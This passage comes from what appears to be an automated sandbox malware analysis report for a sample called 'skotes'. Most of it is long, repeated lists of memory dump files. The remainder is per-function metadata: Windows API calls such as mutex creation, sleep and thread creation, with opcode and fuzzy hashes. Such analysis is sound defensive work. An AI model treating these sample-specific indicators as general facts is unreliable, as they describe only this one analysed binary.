Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 0eb4c12ca01b1a66739ca4601dda8a6a95215903e8e39efb6fcdb2a7efb5ab66
Instruction ID: 9e3c25fdcf3578a34ee052c7e18431626e65dbdb0465ea536ff8bf76dd777b9b
Opcode Fuzzy Hash: 0eb4c12ca01b1a66739ca4601dda8a6a95215903e8e39efb6fcdb2a7efb5ab66
Instruction Fuzzy Hash: 82316C72B002048BEB08DB78CD89B9DB772EB82314F24C62EE004B73D1D73D9991865A

Function 0040A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: cef926c68ad3f6386af29d31e5ab69579f29e5c71089d4a921acf551ce5112d1
Instruction ID: 48f140da44de9400279700c14c6ef97417640525a214616c03b4f19f3ba1b821
Opcode Fuzzy Hash: cef926c68ad3f6386af29d31e5ab69579f29e5c71089d4a921acf551ce5112d1
Instruction Fuzzy Hash: 84E07D1138D30095FA4037EA9C82B6F211687E6F01F714836E304DB1D6CABC586060AF

Function 00407590 Relevance: 4.7, APIs: 3, Instructions: 158sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,F89C42A9,?,00000000,00449138,000000FF), ref: 004075CC
CreateThread.KERNEL32(00000000,00000000,00407430,00468638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004076BF
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076C9

Part of subcall function 0041D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0041D17B

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep$ConditionCreateThreadVariableWake
String ID:
API String ID: 79123409-0
Opcode ID: 2ebb19603ab2c7ce8114900c4aa57c1e1c7761b5ca59b78465d0a12fe575aed1
Instruction ID: 5f48fabf3cd1c68a365f2082abb14c384429a01a786b71fd12d30584acc33be2
Opcode Fuzzy Hash: 2ebb19603ab2c7ce8114900c4aa57c1e1c7761b5ca59b78465d0a12fe575aed1
Instruction Fuzzy Hash: 4151D5B0641248ABEB14CF28DD85B8D3B61EB45718F50462EF815973D1DBBDE4808B9E

Function 00416D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00416D11
Sleep.KERNEL32(00007530), ref: 00416D25

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 3f7075ae21071cbe051501ae2a10001984a94b7d474ad0fe30bab9cf7ce6c77b
Instruction ID: 6d20f71b382fdeb950df7f04c05b36a9693e4fe3457e24c9ad85765341071deb
Opcode Fuzzy Hash: 3f7075ae21071cbe051501ae2a10001984a94b7d474ad0fe30bab9cf7ce6c77b
Instruction Fuzzy Hash: F1D012387C0314B6F22002202C0BFA6AA209B0AF11F26484673483F0D081E8B04086AC

Function 00408380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408524

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 4079a0babdd4ae6f433697a9c13eaa15b1c27463fc6fa4cf93520f6a9b1ec11d
Instruction ID: 45776c1afbedf53b0295dbbc16a4d6147d702a50f8292f74a012159c0bdc0350
Opcode Fuzzy Hash: 4079a0babdd4ae6f433697a9c13eaa15b1c27463fc6fa4cf93520f6a9b1ec11d
Instruction Fuzzy Hash: A3512770D00214ABEB14EB68CE457DEB775DB46314F5042AEE444B72C1EF385EC48B99

Function 00436E4C Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
